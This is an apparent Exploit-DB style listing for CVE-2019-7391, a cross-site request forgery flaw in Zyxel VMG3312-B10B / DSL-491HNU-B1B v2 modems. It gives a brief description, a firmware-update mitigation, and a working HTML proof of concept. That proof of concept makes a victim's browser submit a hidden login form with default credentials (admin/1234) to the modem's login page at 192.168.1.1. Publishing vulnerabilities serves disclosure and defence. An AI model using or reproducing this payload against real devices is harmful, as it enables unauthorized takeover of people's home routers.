header-logo
Suggest Exploit
vendor:
VMG3312-B10B
by:
Yusuf Furkan
8.8
CVSS
HIGH
CSRF
CWE
Product Name: VMG3312-B10B
Affected Version From:
Affected Version To:
Patch Exists:
Related CWE: CVE-2019-7391
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Parrot Os

Zyxel VMG3312-B10B DSL-491HNU-B1B v2 modem CSRF Exploit

This exploit allows an attacker to perform a CSRF attack on the Zyxel VMG3312-B10B DSL-491HNU-B1B v2 modem. The attacker can trick the victim into submitting a malicious request that performs unauthorized actions on the modem.

Mitigation:

To mitigate this vulnerability, it is recommended to update the firmware of the Zyxel VMG3312-B10B DSL-491HNU-B1B v2 modem to the latest version.
Source

Exploit-DB raw data:

# Exploit Title: Zyxel VMG3312-B10B DSL-491HNU-B1B v2 modem CSRF Exploit
# Version: Zyxel VMG3312-B10B
# Tested on : Parrot Os
# Author: Yusuf Furkan
# Twitter: h1_yusuf
# CVE: CVE-2019-7391
# model name: DSL-491HNU-B1B v2

<html>
  <!-- CSRF PoC - generated by Yusuf -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.1.1/login/login-page.cgi" method="POST">
      <input type="hidden" name="AuthName" value="admin" />
      <input type="hidden" name="AuthPassword" value="1234" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>